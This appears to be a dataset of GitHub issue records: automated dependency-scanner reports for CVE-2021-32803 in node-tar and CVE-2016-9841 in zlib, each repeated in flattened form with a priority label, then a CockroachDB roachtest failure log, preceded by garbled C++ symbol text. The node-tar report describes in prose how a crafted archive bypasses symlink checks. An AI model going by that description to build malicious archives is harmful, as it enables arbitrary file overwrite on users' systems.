std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt gt gt gt unsigned char const int int std tuple lt std reference wrapper lt flashmtk plugin gt std ph lt gt std ph lt gt std ph lt gt std ph lt gt std ph lt gt gt std tuple lt neonflash device const amp std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt gt gt gt amp amp unsigned char const amp amp int amp amp int amp amp gt gt std invoker ret lt std unforced gt std integer sequence lt unsigned int gt std func impl no alloc lt std binder lt std unforced std tuple lt int nlohmann basic json lt std map std vector std basic string lt char std char traits lt char gt std allocator lt char gt gt bool unsigned double std allocator nlohmann adl serializer std vector lt unsigned char std allocator lt unsigned char gt gt gt gt thiscall flashmtk plugin neonflash device const amp std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt gt gt gt unsigned char const int int std reference wrapper lt flashmtk plugin gt std ph lt gt const amp std ph lt gt const amp std ph lt gt const amp std ph lt gt const amp std ph lt gt const amp gt std tuple lt int nlohmann basic json lt std map std vector std basic string lt char std char traits lt char gt std allocator lt char gt gt bool unsigned double std allocator nlohmann adl serializer std vector lt unsigned char std allocator lt unsigned char gt gt gt gt neonflash device const amp std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt gt gt gt unsigned char const int int gt do call flashplugin flash device flashplugin flashing thread std thread invoke lt std tuple lt main lt lambda gt gt gt thread start lt unsigned int stdcall void gt
0
168,814
20,820,087,454
IssuesEvent
2022-03-18 14:33:48
AlexRogalskiy/github-action-user-contribution
https://api.github.com/repos/AlexRogalskiy/github-action-user-contribution
opened
CVE-2021-32803 (High) detected in tar-2.2.2.tgz, tar-6.1.0.tgz
security vulnerability
## CVE-2021-32803 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tar-2.2.2.tgz</b>, <b>tar-6.1.0.tgz</b></p></summary> <p> <details><summary><b>tar-2.2.2.tgz</b></p></summary> <p>tar for node</p> <p>Library home page: <a href="https://registry.npmjs.org/tar/-/tar-2.2.2.tgz">https://registry.npmjs.org/tar/-/tar-2.2.2.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/node-gyp/node_modules/tar/package.json,/node_modules/@definitelytyped/utils/node_modules/tar/package.json</p> <p> Dependency Hierarchy: - dtslint-4.1.6.tgz (Root Library) - utils-0.0.89.tgz - :x: **tar-2.2.2.tgz** (Vulnerable Library) </details> <details><summary><b>tar-6.1.0.tgz</b></p></summary> <p>tar for node</p> <p>Library home page: <a href="https://registry.npmjs.org/tar/-/tar-6.1.0.tgz">https://registry.npmjs.org/tar/-/tar-6.1.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/tar/package.json,/node_modules/npm/node_modules/tar/package.json</p> <p> Dependency Hierarchy: - editorconfig-checker-4.0.2.tgz (Root Library) - :x: **tar-6.1.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/AlexRogalskiy/github-action-user-contribution/commit/c0b44037b1a926140bd779553e9d04b0ff48d898">c0b44037b1a926140bd779553e9d04b0ff48d898</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The npm package "tar" (aka node-tar) before versions 6.1.2, 5.0.7, 4.4.15, and 3.2.3 has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2. <p>Publish Date: 2021-08-03 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-32803>CVE-2021-32803</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>8.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw">https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw</a></p> <p>Release Date: 2021-08-03</p> <p>Fix Resolution: tar - 3.2.3, 4.4.15, 5.0.7, 6.1.2</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2021-32803 (High) detected in tar-2.2.2.tgz, tar-6.1.0.tgz - ## CVE-2021-32803 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tar-2.2.2.tgz</b>, <b>tar-6.1.0.tgz</b></p></summary> <p> <details><summary><b>tar-2.2.2.tgz</b></p></summary> <p>tar for node</p> <p>Library home page: <a href="https://registry.npmjs.org/tar/-/tar-2.2.2.tgz">https://registry.npmjs.org/tar/-/tar-2.2.2.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/node-gyp/node_modules/tar/package.json,/node_modules/@definitelytyped/utils/node_modules/tar/package.json</p> <p> Dependency Hierarchy: - dtslint-4.1.6.tgz (Root Library) - utils-0.0.89.tgz - :x: **tar-2.2.2.tgz** (Vulnerable Library) </details> <details><summary><b>tar-6.1.0.tgz</b></p></summary> <p>tar for node</p> <p>Library home page: <a href="https://registry.npmjs.org/tar/-/tar-6.1.0.tgz">https://registry.npmjs.org/tar/-/tar-6.1.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/tar/package.json,/node_modules/npm/node_modules/tar/package.json</p> <p> Dependency Hierarchy: - editorconfig-checker-4.0.2.tgz (Root Library) - :x: **tar-6.1.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/AlexRogalskiy/github-action-user-contribution/commit/c0b44037b1a926140bd779553e9d04b0ff48d898">c0b44037b1a926140bd779553e9d04b0ff48d898</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The npm package "tar" (aka node-tar) before versions 6.1.2, 5.0.7, 4.4.15, and 3.2.3 has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2. <p>Publish Date: 2021-08-03 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-32803>CVE-2021-32803</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>8.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw">https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw</a></p> <p>Release Date: 2021-08-03</p> <p>Fix Resolution: tar - 3.2.3, 4.4.15, 5.0.7, 6.1.2</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve high detected in tar tgz tar tgz cve high severity vulnerability vulnerable libraries tar tgz tar tgz tar tgz tar for node library home page a href path to dependency file package json path to vulnerable library node modules node gyp node modules tar package json node modules definitelytyped utils node modules tar package json dependency hierarchy dtslint tgz root library utils tgz x tar tgz vulnerable library tar tgz tar for node library home page a href path to dependency file package json path to vulnerable library node modules tar package json node modules npm node modules tar package json dependency hierarchy editorconfig checker tgz root library x tar tgz vulnerable library found in head commit a href found in base branch master vulnerability details the npm package tar aka node tar before versions and has an arbitrary file creation overwrite vulnerability via insufficient symlink protection node tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted this is in part achieved by ensuring that extracted directories are not symlinks additionally in order to prevent unnecessary stat calls to determine whether a given path is a directory paths are cached when directories are created this logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory this order of operations resulted in the directory being created and added to the node tar directory cache when a directory is present in the directory cache subsequent calls to mkdir for that directory are skipped however this is also where node tar checks for symlinks occur by first creating a directory and then replacing that directory with a symlink it was thus possible to bypass node tar symlink checks on directories essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location thus allowing arbitrary file creation and overwrite this issue was addressed in releases and publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact none integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution tar step up your open source security game with whitesource
0
112,539
17,091,380,155
IssuesEvent
2021-07-08 17:57:28
snowdensb/questdb
https://api.github.com/repos/snowdensb/questdb
opened
CVE-2016-9841 (High) detected in zlibv1.2.8
security vulnerability
## CVE-2016-9841 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>zlibv1.2.8</b></p></summary> <p> <p>A massively spiffy yet delicately unobtrusive compression library.</p> <p>Library home page: <a href=https://github.com/cyanskies/zlib.git>https://github.com/cyanskies/zlib.git</a></p> <p>Found in HEAD commit: <a href="https://github.com/snowdensb/questdb/commit/986fb5a45f1a404e834432310649a2fad70f81db">986fb5a45f1a404e834432310649a2fad70f81db</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>questdb/core/src/main/c/share/zlib-1.2.8/inffast.c</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> inffast.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact by leveraging improper pointer arithmetic. <p>Publish Date: 2017-05-23 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2016-9841>CVE-2016-9841</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9841">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9841</a></p> <p>Release Date: 2017-05-23</p> <p>Fix Resolution: v1.2.9</p> </p> </details> <p></p>
True
CVE-2016-9841 (High) detected in zlibv1.2.8 - ## CVE-2016-9841 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>zlibv1.2.8</b></p></summary> <p> <p>A massively spiffy yet delicately unobtrusive compression library.</p> <p>Library home page: <a href=https://github.com/cyanskies/zlib.git>https://github.com/cyanskies/zlib.git</a></p> <p>Found in HEAD commit: <a href="https://github.com/snowdensb/questdb/commit/986fb5a45f1a404e834432310649a2fad70f81db">986fb5a45f1a404e834432310649a2fad70f81db</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>questdb/core/src/main/c/share/zlib-1.2.8/inffast.c</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> inffast.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact by leveraging improper pointer arithmetic. <p>Publish Date: 2017-05-23 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2016-9841>CVE-2016-9841</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9841">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9841</a></p> <p>Release Date: 2017-05-23</p> <p>Fix Resolution: v1.2.9</p> </p> </details> <p></p>
non_priority
cve high detected in cve high severity vulnerability vulnerable library a massively spiffy yet delicately unobtrusive compression library library home page a href found in head commit a href found in base branch master vulnerable source files questdb core src main c share zlib inffast c vulnerability details inffast c in zlib might allow context dependent attackers to have unspecified impact by leveraging improper pointer arithmetic publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution
0
247,167
20,960,396,380
IssuesEvent
2022-03-27 18:07:30
jpd002/Play-Compatibility
https://api.github.com/repos/jpd002/Play-Compatibility
opened
[SLES-51308] Reel Fishing III
state-ingame testing-needed
**Last Tested On** [27/03/2022] - https://github.com/jpd002/Play-/commit/630c31b2e754a67fb7f69fb6998a7fbdfa31ea90 **Known Issues & Notes** In-game, needs more testing to confirm if it's fully playable **Related** **Screenshots**
1.0
[SLES-51308] Reel Fishing III - **Last Tested On** [27/03/2022] - https://github.com/jpd002/Play-/commit/630c31b2e754a67fb7f69fb6998a7fbdfa31ea90 **Known Issues & Notes** In-game, needs more testing to confirm if it's fully playable **Related** **Screenshots**
non_priority
reel fishing iii last tested on known issues notes in game needs more testing to confirm if it s fully playable related screenshots
0
439,105
30,678,716,526
IssuesEvent
2023-07-26 07:41:32
pharmaverse/admiraldev
https://api.github.com/repos/pharmaverse/admiraldev
closed
RMarkdown Error when building {admiraldev} site
bug documentation programming
### What happened? I just now cloned the repo and tried to re-build the site. After running `pkgdown::build_site()`, site start building as normal - documentation pages and vignettes are built, after which until an error is thrown about something to do with RMarkdown: ``` RMarkdown error Set renv profile to `4.2` Quitting from lines 128-134 (writing_vignettes.Rmd) Error: ! in callr subprocess. Caused by error in `map(.x, .f, ..., .progress = .progress)`: ! In index: 10. See `$stdout` and `$stderr` for standard output and error. ``` ### Session Information R version 4.2.2 Patched (2022-11-10 r83330) Platform: x86_64-pc-linux-gnu (64-bit) Running under: Ubuntu 20.04.6 LTS Matrix products: default BLAS: /usr/lib/x86_64-linux-gnu/blas/libblas.so.3.9.0 LAPACK: /usr/lib/x86_64-linux-gnu/lapack/liblapack.so.3.9.0 locale: [1] LC_CTYPE=en_US.UTF-8 LC_NUMERIC=C [3] LC_TIME=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 [5] LC_MONETARY=en_US.UTF-8 LC_MESSAGES=en_US.UTF-8 [7] LC_PAPER=en_US.UTF-8 LC_NAME=C [9] LC_ADDRESS=C LC_TELEPHONE=C [11] LC_MEASUREMENT=en_US.UTF-8 LC_IDENTIFICATION=C attached base packages: [1] stats graphics grDevices datasets utils methods base other attached packages: [1] pkgdown_2.0.7 loaded via a namespace (and not attached): [1] rstudioapi_0.14 knitr_1.42 magrittr_2.0.3 R6_2.5.1 [5] rlang_1.1.0 fastmap_1.1.1 fansi_1.0.4 tools_4.2.2 [9] xfun_0.39 utf8_1.2.3 cli_3.6.0 withr_2.5.0 [13] htmltools_0.5.4 digest_0.6.31 yaml_2.3.7 rprojroot_2.0.3 [17] tibble_3.2.0 lifecycle_1.0.3 processx_3.8.0 callr_3.7.3 [21] purrr_1.0.1 ps_1.7.2 vctrs_0.6.0 fs_1.6.1 [25] memoise_2.0.1 glue_1.6.2 cachem_1.0.7 evaluate_0.20 [29] rmarkdown_2.20 compiler_4.2.2 pillar_1.9.0 desc_1.4.2 [33] renv_0.17.0 pkgconfig_2.0.3 ### Reproducible Example Just run `pkgdown::build_site()`
1.0
RMarkdown Error when building {admiraldev} site - ### What happened? I just now cloned the repo and tried to re-build the site. After running `pkgdown::build_site()`, site start building as normal - documentation pages and vignettes are built, after which until an error is thrown about something to do with RMarkdown: ``` RMarkdown error Set renv profile to `4.2` Quitting from lines 128-134 (writing_vignettes.Rmd) Error: ! in callr subprocess. Caused by error in `map(.x, .f, ..., .progress = .progress)`: ! In index: 10. See `$stdout` and `$stderr` for standard output and error. ``` ### Session Information R version 4.2.2 Patched (2022-11-10 r83330) Platform: x86_64-pc-linux-gnu (64-bit) Running under: Ubuntu 20.04.6 LTS Matrix products: default BLAS: /usr/lib/x86_64-linux-gnu/blas/libblas.so.3.9.0 LAPACK: /usr/lib/x86_64-linux-gnu/lapack/liblapack.so.3.9.0 locale: [1] LC_CTYPE=en_US.UTF-8 LC_NUMERIC=C [3] LC_TIME=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 [5] LC_MONETARY=en_US.UTF-8 LC_MESSAGES=en_US.UTF-8 [7] LC_PAPER=en_US.UTF-8 LC_NAME=C [9] LC_ADDRESS=C LC_TELEPHONE=C [11] LC_MEASUREMENT=en_US.UTF-8 LC_IDENTIFICATION=C attached base packages: [1] stats graphics grDevices datasets utils methods base other attached packages: [1] pkgdown_2.0.7 loaded via a namespace (and not attached): [1] rstudioapi_0.14 knitr_1.42 magrittr_2.0.3 R6_2.5.1 [5] rlang_1.1.0 fastmap_1.1.1 fansi_1.0.4 tools_4.2.2 [9] xfun_0.39 utf8_1.2.3 cli_3.6.0 withr_2.5.0 [13] htmltools_0.5.4 digest_0.6.31 yaml_2.3.7 rprojroot_2.0.3 [17] tibble_3.2.0 lifecycle_1.0.3 processx_3.8.0 callr_3.7.3 [21] purrr_1.0.1 ps_1.7.2 vctrs_0.6.0 fs_1.6.1 [25] memoise_2.0.1 glue_1.6.2 cachem_1.0.7 evaluate_0.20 [29] rmarkdown_2.20 compiler_4.2.2 pillar_1.9.0 desc_1.4.2 [33] renv_0.17.0 pkgconfig_2.0.3 ### Reproducible Example Just run `pkgdown::build_site()`
non_priority
rmarkdown error when building admiraldev site what happened i just now cloned the repo and tried to re build the site after running pkgdown build site site start building as normal documentation pages and vignettes are built after which until an error is thrown about something to do with rmarkdown rmarkdown error set renv profile to quitting from lines writing vignettes rmd error in callr subprocess caused by error in map x f progress progress in index see stdout and stderr for standard output and error session information r version patched platform pc linux gnu bit running under ubuntu lts matrix products default blas usr lib linux gnu blas libblas so lapack usr lib linux gnu lapack liblapack so locale lc ctype en us utf lc numeric c lc time en us utf lc collate en us utf lc monetary en us utf lc messages en us utf lc paper en us utf lc name c lc address c lc telephone c lc measurement en us utf lc identification c attached base packages stats graphics grdevices datasets utils methods base other attached packages pkgdown loaded via a namespace and not attached rstudioapi knitr magrittr rlang fastmap fansi tools xfun cli withr htmltools digest yaml rprojroot tibble lifecycle processx callr purrr ps vctrs fs memoise glue cachem evaluate rmarkdown compiler pillar desc renv pkgconfig reproducible example just run pkgdown build site
0
108,221
9,292,384,249
IssuesEvent
2019-03-22 02:52:10
hieupham0206/crm_yes
https://api.github.com/repos/hieupham0206/crm_yes
closed
Issue on Dashboard
bug test
* [x] số cuộc gọi trong ngày chưa hoạt động * [x] Lấy thêm nhân viên có Role là REP
1.0
Issue on Dashboard - * [x] số cuộc gọi trong ngày chưa hoạt động * [x] Lấy thêm nhân viên có Role là REP
non_priority
issue on dashboard số cuộc gọi trong ngày chưa hoạt động lấy thêm nhân viên có role là rep
0
398,844
27,214,736,592
IssuesEvent
2023-02-20 20:16:29
Xolvez/DD2480-JavaScript
https://api.github.com/repos/Xolvez/DD2480-JavaScript
closed
Explain how to refactor the function `ConvexHullGraham.convexHull`
documentation
Describe how the function `ConvexHullGraham.convexHull` could be refactored in order to reduce its complexity.
1.0
Explain how to refactor the function `ConvexHullGraham.convexHull` - Describe how the function `ConvexHullGraham.convexHull` could be refactored in order to reduce its complexity.
non_priority
explain how to refactor the function convexhullgraham convexhull describe how the function convexhullgraham convexhull could be refactored in order to reduce its complexity
0
166,075
12,890,247,027
IssuesEvent
2020-07-13 15:42:21
cockroachdb/cockroach
https://api.github.com/repos/cockroachdb/cockroach
closed
roachtest: kv/contention/nodes=4 failed
C-test-failure O-roachtest O-robot branch-provisional_202007081918_v20.2.0-alpha.2 release-blocker
[(roachtest).kv/contention/nodes=4 failed](https://teamcity.cockroachdb.com/viewLog.html?buildId=2076004&tab=buildLog) on [provisional_202007081918_v20.2.0-alpha.2@cf051c8c91d5e1d5196e6d2fdc9382364e1d44e8](https://github.com/cockroachdb/cockroach/commits/cf051c8c91d5e1d5196e6d2fdc9382364e1d44e8): ``` The test failed on branch=provisional_202007081918_v20.2.0-alpha.2, cloud=gce: test artifacts and logs in: /home/agent/work/.go/src/github.com/cockroachdb/cockroach/artifacts/kv/contention/nodes=4/run_1 ts_util.go:116,kv.go:259,cluster.go:2449,errgroup.go:57: average txns per second 14.725106 was under target 100.000000 cluster.go:2471,kv.go:262,test_runner.go:757: monitor failure: monitor task failed: t.Fatal() was called (1) attached stack trace | main.(*monitor).WaitE | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2459 | main.(*monitor).Wait | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2467 | main.registerKVContention.func1 | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/kv.go:262 | main.(*testRunner).runTest.func2 | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/test_runner.go:757 Wraps: (2) monitor failure Wraps: (3) attached stack trace | main.(*monitor).wait.func2 | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2515 Wraps: (4) monitor task failed Wraps: (5) attached stack trace | main.init | /home/agent/work/.go/src/github.com/cockroachdb/cockroach/pkg/cmd/roachtest/cluster.go:2429 | runtime.doInit | /usr/local/go/src/runtime/proc.go:5420 | runtime.main | /usr/local/go/src/runtime/proc.go:190 | runtime.goexit | /usr/local/go/src/runtime/asm_amd64.s:1373 Wraps: (6) t.Fatal() was called Error types: (1) *withstack.withStack (2) *errutil.withMessage (3) *withstack.withStack (4) *errutil.withMessage (5) *withstack.withStack (6) *errors.errorString ``` <details><summary>More</summary><p> Artifacts: [/kv/contention/nodes=4](https://teamcity.cockroachdb.com/viewLog.html?buildId=2076004&tab=artifacts#/kv/contention/nodes=4) Related: - #51028 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-provisional_202006292135_v19.2.9](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-provisional_202006292135_v19.2.9) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #50864 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-master](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-master) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #50542 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) [O-roachtest](https://api.github.com/repos/cockroachdb/cockroach/labels/O-roachtest) [O-robot](https://api.github.com/repos/cockroachdb/cockroach/labels/O-robot) [branch-provisional_202006230817_v19.2.8](https://api.github.com/repos/cockroachdb/cockroach/labels/branch-provisional_202006230817_v19.2.8) [release-blocker](https://api.github.com/repos/cockroachdb/cockroach/labels/release-blocker) - #48727 roachtest: kv/contention/nodes=4 failed [C-test-failure](https://api.github.com/repos/cockroachdb/cockroach/labels/C-test-failure) 